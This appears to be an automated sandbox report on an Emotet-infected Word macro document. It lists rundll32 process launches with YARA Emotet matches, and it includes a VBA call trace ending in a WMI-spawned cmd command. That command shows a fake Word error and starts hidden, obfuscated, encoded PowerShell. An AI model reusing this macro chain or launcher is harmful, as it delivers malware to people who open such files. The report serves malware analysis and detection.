                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mjwjtkxgnh\wyssufqxr.vub',Control_RunDLL
                                            Imagebase:0xa10000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2113145679.00000000006A0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2113198407.00000000006C1000.00000020.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:08:44:52
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iiasa\gdao.xuk',Control_RunDLL
                                            Imagebase:0xa10000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2114491757.00000000001D1000.00000020.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2114433259.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:08:44:53
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kjucifzppxjqp\brxqhmcbxcls.kkx',Control_RunDLL
                                            Imagebase:0xa10000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2115843341.0000000000470000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2115897834.00000000004B1000.00000020.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:08:44:53
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Chaxbancxgzy\rbmbxmqpfdk.tvd',Control_RunDLL
                                            Imagebase:0xa10000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2117263919.00000000007D1000.00000020.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2116824052.00000000002B0000.00000040.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:08:44:54
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Umbfypagzceb\sgdrbhhkrdu.ucy',Control_RunDLL
                                            Imagebase:0xa10000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2120152287.0000000000240000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2120200224.0000000000261000.00000020.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:08:44:55
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pegimmebijdsrjpt\trbcflzgrjlwmib.jho',Control_RunDLL
                                            Imagebase:0xa10000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2123134959.0000000000270000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2123517027.00000000006B1000.00000020.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:08:44:56
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pqftsc\netes.ucb',Control_RunDLL
                                            Imagebase:0xa10000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2352632908.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security

                                            Disassembly

                                            Code Analysis

                                            Module: A5gd21klfqu9c6rs

                                            Declaration
                                            Attribute VB_Name = "A5gd21klfqu9c6rs"
                                            Attribute VB_Base = "1Normal.ThisDocument"
                                            Attribute VB_GlobalNameSpace = False
                                            Attribute VB_Creatable = False
                                            Attribute VB_PredeclaredId = True
                                            Attribute VB_Exposed = True
                                            Attribute VB_TemplateDerived = True
                                            Attribute VB_Customizable = True

                                            Executed Functions
                                            APIs / Meta Information


                                            Instruction / Meta Information
                                            Private Sub Document_open()
                                                G8xesq0b8jlsfrsp    ' meta information: executed
                                            End Sub

                                            Module: Owppnp8hah4xo788

                                            Declaration
                                            Attribute VB_Name = "Owppnp8hah4xo788"

                                            Executed Functions
                                            APIs / Meta Information


                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                            CreateTextFile

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            GznGGHyG

                                            Close

                                            bbsIZ

                                            Mid

                                            Name

                                            Application

                                            swNGWdd

                                            CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                            CreateTextFile

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            rJEkbLH

                                            Close

                                            vEBqHrDnD

                                            tWcKo

                                            CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                            CreateTextFile

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            LzxxRHG

                                            Close

                                            EKezHIC

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                            DpYbmDA

                                            CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                            CreateTextFile

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            hDJDJ

                                            Close

                                            dXiwA

                                            CreateObject

                                            CreateObject("winmgmts:win32_process")

                                            hFSyAfFrF

                                            CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                            CreateTextFile

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            hXxQDACJA

                                            Close

                                            xkQqDXCcD

                                            Mid

                                            Len

                                            lBenBDA

                                            CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                            CreateTextFile

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            UavHTIBHo

                                            Close

                                            IcAHwPH

                                            BNmrm

                                            CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                            CreateTextFile

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            FLtYjKHC

                                            Close

                                            qAUhkIMz

                                            Create

                                            SWbemObjectEx.Create("cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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,,) -> 0

                                            V2enhc4htwl7z6bh

